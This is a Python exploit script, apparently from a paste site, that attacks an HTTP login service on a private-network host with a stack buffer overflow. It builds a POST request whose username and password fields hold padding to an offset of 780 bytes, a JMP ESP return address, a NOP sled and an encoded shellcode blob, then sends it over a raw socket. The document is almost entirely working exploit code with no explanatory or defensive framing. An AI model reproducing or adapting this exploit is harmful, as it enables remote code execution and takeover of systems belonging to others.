#!/usr/bin/env pythonimport socketimport timehost = '192.168.2.19'po

1. #!/usr/bin/env python
2.  
3. import socket
4. import time
5.  
6. host = '192.168.2.19'
7. port = 8080
8.  
9. def send_payload(payload):
10. evil = "POST /login HTTP/1.1\r\n"
11. evil += "Host: 192.168.2.19\r\n"
12. evil += "User-Agent: Mozilla/5.0\r\n"
13. evil += "Connection: close\r\n"
14. evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
15. evil += "Accept-Language: en-us,en;q=0.5\r\n"
16. evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
17. evil += "Keep-Alive: 300\r\n"
18. evil += "Proxy-Connection: keep-alive\r\n"
19. evil += "Content-Type: application/x-www-form-urlencoded\r\n"
20. evil += "Content-Length: 17000\r\n\r\n"
21. evil += "username=" + payload
22. evil += "&password=" + payload + "\r\n"
23. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24. connect = s.connect((host, port))
25. s.send(evil)
26. s.close()
27.  
28. shellcode = ("\xda\xc0\xbf\x6d\xc8\xba\x9a\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
29. "\x56\x31\x7a\x18\x83\xea\xfc\x03\x7a\x79\x2a\x4f\x66\x69\x28"
30. "\xb0\x97\x69\x4d\x38\x72\x58\x4d\x5e\xf6\xca\x7d\x14\x5a\xe6"
31. "\xf6\x78\x4f\x7d\x7a\x55\x60\x36\x31\x83\x4f\xc7\x6a\xf7\xce"
32. "\x4b\x71\x24\x31\x72\xba\x39\x30\xb3\xa7\xb0\x60\x6c\xa3\x67"
33. "\x95\x19\xf9\xbb\x1e\x51\xef\xbb\xc3\x21\x0e\xed\x55\x3a\x49"
34. "\x2d\x57\xef\xe1\x64\x4f\xec\xcc\x3f\xe4\xc6\xbb\xc1\x2c\x17"
35. "\x43\x6d\x11\x98\xb6\x6f\x55\x1e\x29\x1a\xaf\x5d\xd4\x1d\x74"
36. "\x1c\x02\xab\x6f\x86\xc1\x0b\x54\x37\x05\xcd\x1f\x3b\xe2\x99"
37. "\x78\x5f\xf5\x4e\xf3\x5b\x7e\x71\xd4\xea\xc4\x56\xf0\xb7\x9f"
38. "\xf7\xa1\x1d\x71\x07\xb1\xfe\x2e\xad\xb9\x12\x3a\xdc\xe3\x7a"
39. "\x8f\xed\x1b\x7a\x87\x66\x6f\x48\x08\xdd\xe7\xe0\xc1\xfb\xf0"
40. "\x71\xc5\xfb\x2f\x39\x86\x05\xd0\x39\x8e\xc1\x84\x69\xb8\xe0"
41. "\xa4\xe2\x38\x0c\x71\x9e\x32\x9a\xba\xf6\x41\x4d\x53\x04\x46"
42. "\x60\xff\x81\xa0\xd2\xaf\xc1\x7c\x93\x1f\xa1\x2c\x7b\x4a\x2e"
43. "\x12\x9b\x75\xe5\x3b\x36\x9a\x53\x13\xaf\x03\xfe\xef\x4e\xcb"
44. "\xd5\x95\x51\x47\xdf\x6a\x1f\xa0\xaa\x78\x48\xd7\x54\x81\x89"
45. "\x72\x54\xeb\x8d\xd4\x03\x83\x8f\x01\x63\x0c\x6f\x64\xf0\x4b"
46. "\x8f\xf9\xc0\x20\xa6\x6f\x6c\x5f\xc7\x7f\x6c\x9f\x91\x15\x6c"
47. "\xf7\x45\x4e\x3f\xe2\x89\x5b\x2c\xbf\x1f\x64\x04\x13\xb7\x0c"
48. "\xaa\x4a\xff\x92\x55\xb9\x83\xd5\xa9\x3f\xac\x7d\xc1\xbf\xec"
49. "\x7d\x11\xaa\xec\x2d\x79\x21\xc2\xc2\x49\xca\xc9\x8a\xc1\x41"
50. "\x9c\x79\x70\x55\xb5\xdc\x2c\x56\x3a\xc5\xdf\x2d\x33\xfa\x20"
51. "\xd2\x5d\x9f\x21\xd2\x61\xa1\x1e\x04\x58\xd7\x61\x94\xdf\xe8"
52. "\xd4\xb9\x76\x63\x16\xed\x89\xa6")
53.  
54.  
55. if __name__ == '__main__':
56. # [*] Exact match at offset 780
57. offset = 780
58. maxsize = 10000
59. jmpesp = '\x33\x5D\xCA\x77'
60. payload = 'A' * offset + jmpesp + '\x90' * 100 + shellcode + '\x90'* (maxsize - offset - 4 - len(shellcode) - 100)
61. send_payload(payload)